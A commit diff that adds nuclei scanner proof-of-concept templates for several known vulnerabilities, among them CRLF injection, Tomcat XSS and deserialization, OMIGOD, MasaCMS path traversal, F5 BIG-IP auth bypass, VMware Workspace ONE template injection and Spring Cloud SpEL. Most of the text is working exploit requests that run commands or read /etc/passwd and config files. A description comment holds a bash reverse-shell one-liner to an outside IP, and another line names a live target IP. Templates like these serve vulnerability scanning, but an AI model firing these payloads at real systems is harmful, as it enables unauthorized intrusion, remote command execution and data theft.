add more nuclei yaml pocs 2023-09-16

Author: hktalent

config/51pwn/CRLF.yaml

@@ -0,0 +1,47 @@
+id: CheckCVE_CRLF
+info:
+  name: CheckCVE_CRLF
+  author: 51pwn
+  severity: critical
+  description: |
+    CRLF injection is possible if the attacker controls a url parameter, as demonstrated by the first argument to urllib.request.urlopen with \r\n (specifically in the path component of a URL that lacks a ? character) followed by an HTTP header or a Redis command. This is similar to the CVE-2019-9740 query string issue and the CVE-2019-9947 path string issue. (This is not exploitable when glibc has CVE-2016-10739 fixed.)
+    cat hk1_httpx.json|jq '.url'|sed 's/"//g'|xargs -I % nuclei -duc -t $HOME/MyWork/scan4all/config/51pwn/CRLF.yaml -u % 
+  reference:
+    - https://www.hacking8.com/web-hacking-101-zh/7.html
+    - https://51pwn.com/CyberChef/#recipe=URL_Decode()&input=aHR0cHM6Ly90d2l0dGVyLmNvbS9sb2dpbj9yZWRpcmVjdF9hZnRlcl9sb2dpbj1odHRwczovL3R3aXR0ZXIuY29tOjIxLyVFNSU5OCU4QQolRTUlOTglOERjb250ZW50LXR5cGU6dGV4dC9odG1sJUU1JTk4JThBJUU1JTk4JThEbG9jYXRpb246JUU1JTk4JThBJUU1JTk4JThECiVFNSU5OCU4QSVFNSU5OCU4RCVFNSU5OCVCQ3N2Zy9vbmxvYWQ9YWxlcnQlMjhpbm5lckhUTUwlMjglMjklRTUlOTglQkU
+
+  tags: web,crlf
+
+requests:
+  - raw:
+      - |+
+        GET /login?redirect_after_login=https://twitter.com:21/%E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE HTTP/1.1
+        Host: {{Hostname}}
+        Accept:*/*
+        Pragma:no-cache
+        Accept-Encoding:gzip, deflate
+        Connection: close
+        Content-Length: 0
+
+      - |+
+        GET /?%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>deface</html>",alert(33)," HTTP/1.1
+        Host: {{Hostname}}
+        Accept:*/*
+        Pragma:no-cache
+        Accept-Encoding:gzip, deflate
+        Connection: close
+        Content-Length: 0
+
+      # end payload
+    unsafe: true
+    req-condition: true
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "svg/onload=alert(innerHTML"
+          - "<html>deface</html>"
+
+        

config/51pwn/CVE-2019-0221.yaml

@@ -0,0 +1,46 @@
+id: CVE-2019-0221
+
+info:
+  name: Apache Tomcat - Cross-Site Scripting
+  author: pikpikcu
+  severity: medium
+  description: |
+    Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93 are vulnerable to cross-site scripting because the SSI printenv command echoes user provided data without escaping. Note: SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.
+  reference:
+    - https://seclists.org/fulldisclosure/2019/May/50
+    - https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/
+    - https://www.exploit-db.com/exploits/50119
+    - https://lists.apache.org/thread.html/6e6e9eacf7b28fd63d249711e9d3ccd4e0a83f556e324aee37be5a8c@%3Cannounce.tomcat.apache.org%3E
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-0221
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2019-0221
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: title:"Apache Tomcat"
+  tags: apache,xss,tomcat,seclists,edb,cve,cve2019
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"
+      - "{{BaseURL}}/ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "<script>alert('xss')</script>"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/08/11

config/51pwn/CVE-2020-9484.yaml

@@ -0,0 +1,49 @@
+id: CVE-2020-9484
+
+info:
+  name: Apache Tomcat Remote Command Execution
+  author: dwisiswant0
+  severity: high
+  description: |
+    When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if
+    a) an attacker is able to control the contents and name of a file on the server; and
+    b) the server is configured to use the PersistenceManager with a FileStore; and
+    c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and
+    d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control.
+    Note that all of conditions a) to d) must be true for the attack to succeed.
+  reference:
+    - http://packetstormsecurity.com/files/157924/Apache-Tomcat-CVE-2020-9484-Proof-Of-Concept.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-9484
+    - https://lists.apache.org/thread.html/r77eae567ed829da9012cadb29af17f2df8fa23bf66faf88229857bb1%40%3Cannounce.tomcat.apache.org%3E
+    - https://lists.apache.org/thread.html/rf70f53af27e04869bdac18b1fc14a3ee529e59eb12292c8791a77926@%3Cusers.tomcat.apache.org%3E
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7
+    cve-id: CVE-2020-9484
+    cwe-id: CWE-502
+  metadata:
+    shodan-query: title:"Apache Tomcat"
+  tags: rce,packetstorm,cve,cve2020,apache,tomcat
+
+requests:
+  - method: GET
+    headers:
+      Cookie: "JSESSIONID=../../../../../usr/local/tomcat/groovy"
+    path:
+      - "{{BaseURL}}/index.jsp"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 500
+
+      - type: word
+        part: body
+        words:
+          - "Exception"
+          - "ObjectInputStream"
+          - "PersistentManagerBase"
+        condition: and
+
+# Enhanced by mp on 2022/04/04

config/51pwn/CVE-2021-38647.yaml

@@ -0,0 +1,57 @@
+id: CVE-2021-38647_51pwn
+
+info:
+  name: OMIGOD – RCE Vulnerability in Multiple Azure Linux Deployments CVE-2021-38647
+  author: 51pwn
+  severity: Critical
+  description: |
+    On September 14, multiple vulnerabilities were discovered by researchers at Wiz.io. 
+    The most critical of them being CVE-2021-38647, now dubbed OMIGOD, 
+    which effects the Open Management Infrastructure (OMI) agent in versions 1.6.8.0 and below.
+  reference:
+    - https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/
+
+  tags: RCE,Web
+
+requests:
+  - raw:
+      - |
+        POST /wsman HTTP/1.1
+        Connection: close
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+        Host: {{Hostname}}
+        Content-Type: application/soap+xml;charset=UTF-8
+
+        <s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:h="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema">
+             <s:Header>
+                <a:To>HTTP://192.168.1.1:5986/wsman/</a:To>
+                <w:ResourceURI s:mustUnderstand="true">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>
+                <a:ReplyTo>
+                   <a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
+                </a:ReplyTo>
+                <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteShellCommand</a:Action>
+                <w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize>
+                <a:MessageID>uuid:0AB58087-C2C3-0005-0000-000000010000</a:MessageID>
+                <w:OperationTimeout>PT1M30S</w:OperationTimeout>
+                <w:Locale xml:lang="en-us" s:mustUnderstand="false" />
+                <p:DataLocale xml:lang="en-us" s:mustUnderstand="false" />
+                <w:OptionSet s:mustUnderstand="true" />
+                <w:SelectorSet>
+                   <w:Selector Name="__cimnamespace">root/scx</w:Selector>
+                </w:SelectorSet>
+             </s:Header>
+             <s:Body>
+                <p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
+                   <p:command>id</p:command>
+                   <p:timeout>0</p:timeout>
+                </p:ExecuteShellCommand_INPUT>
+             </s:Body>
+          </s:Envelope>
+
+      # end
+    matchers-condition: and
+    matchers: 
+      - type: regex
+        regex:
+          - <p:StdOut>(.*uid=.*)<\/p:StdOut>
+      

config/51pwn/CVE-2021-42183.yaml

@@ -0,0 +1,26 @@
+id: CVE-2021-42183_51pwn
+info:
+  name: MasaCMS 7.2.1 is affected by a path traversal vulnerability in /index.cfm/_api/asset/image/.
+  author: 51pwn
+  severity: critical
+  reference:
+    - https://github.com/hktalent/nuclei-templates
+    - https://51pwn.com
+  tags: oss
+
+requests:
+  - raw:
+      - |+
+        GET /_api/asset/image/?filePath=/../config/settings.ini.cfm HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+        Pragma:no-cache
+    unsafe: true
+    cookie-reuse: true
+    req-condition: true
+  
+    matchers-condition: or
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code_1 == 200"

config/51pwn/CVE-2022-1388.yaml

@@ -0,0 +1,59 @@
+id: CVE-2022-1388_51pwn
+
+info:
+  name: F5 BIG-IP iControl REST Auth Bypass RCE
+  author: dwisiswant0
+  severity: critical
+  description: |
+    doNuclei https://181.188.0.131 ~/MyWork/mybugbounty/yaml/CVE-2022-1388.yaml
+    This vulnerability may allow an unauthenticated attacker
+    with network access to the BIG-IP system through the management
+    port and/or self IP addresses to execute arbitrary system commands,
+    create or delete files, or disable services. There is no data plane
+    exposure; this is a control plane issue only. # "utilCmdArgs": "-c 'bash -i >& /dev/tcp/107.182.191.202/1234 0>&1' "
+  reference:
+    - https://twitter.com/GossiTheDog/status/1523566937414193153
+    - https://support.f5.com/csp/article/K23605346
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2022-1388
+    cwe-id: CWE-306
+  metadata:
+    shodan-query: http.title:"BIG-IP®-+Redirect" +"Server"
+    verified: true
+  tags: bigip,cve,cve2022,rce,mirai
+
+variables:
+# admin:horizon3
+  auth: "admin:"
+
+requests:
+  - raw:
+      - |
+        POST /mgmt/tm/util/bash HTTP/1.1
+        Host: 127.0.0.1
+        Connection: Keep-Alive, X-F5-Auth-Token, X-Forwarded-Host
+        X-F5-Auth-Token: a
+        Authorization: Basic {{base64(auth)}}
+        Content-Type: application/json
+
+        {
+          "command": "run",
+          "utilCmdArgs": "-c id"
+        }
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "(commandResult)"
+          - "(uid=\\d+\\(.*)"
+      - type: status
+        status:
+          - 200
+        condition: and
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "(uid=\\d+\\([^\\n]{3,})"

config/51pwn/CVE-2022-22954.yaml

@@ -0,0 +1,37 @@
+id: CVE-2022-22954_51pwn
+
+info:
+  name: VMware Workspace ONE Access - Server-Side Template Injection
+  author: 51pwn
+  severity: critical
+  description: |
+    VMware Workspace ONE Access is susceptible to a remote code execution vulnerability due to a server-side template injection flaw. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager.
+  reference:
+    - https://www.tenable.com/blog/vmware-patches-multiple-vulnerabilities-in-workspace-one-vmsa-2022-0011
+    - https://www.vmware.com/security/advisories/VMSA-2022-0011.html
+    - http://packetstormsecurity.com/files/166935/VMware-Workspace-ONE-Access-Template-Injection-Command-Execution.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-22954
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-22954
+    cwe-id: CWE-94
+  metadata:
+    shodan-query: http.favicon.hash:-1250474341
+  tags: cve,cve2022,vmware,ssti,workspaceone,cisa
+
+requests:
+  - method: GET
+    path: 
+    # - "{{BaseURL}}/catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}" # Executes cat /etc/passwd
+      - "{{BaseURL}}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d" # Executes cat /etc/passwd
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "root:*:0:0:"
+
+
+# Enhanced by mp on 2022/07/06

config/51pwn/CVE-2022-22963.yaml

@@ -0,0 +1,33 @@
+id: CVE-2022-22963_51pwn
+
+info:
+  name: spring cloud exp
+  author: Nicolas Krassas
+  severity: critical
+  description: RCE on Spring cloud function SPEL
+  reference: https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert/
+  tags: web,spring
+
+requests:
+- raw:
+  - |-
+    POST /functionRouter HTTP/1.1
+    Host: {{Hostname}}
+    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+    Accept-Encoding: gzip, deflate
+    Accept: */*
+    Connection: close
+    spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("whoami")
+    Accept-Language: en
+    Content-Type: application/x-www-form-urlencoded
+    Content-Length: 4
+    test
+  matchers-condition: and
+  matchers:
+  - type: word
+    part: body
+    words:
+    - 'functionRouter'
+  - type: status
+    status:
+    - 500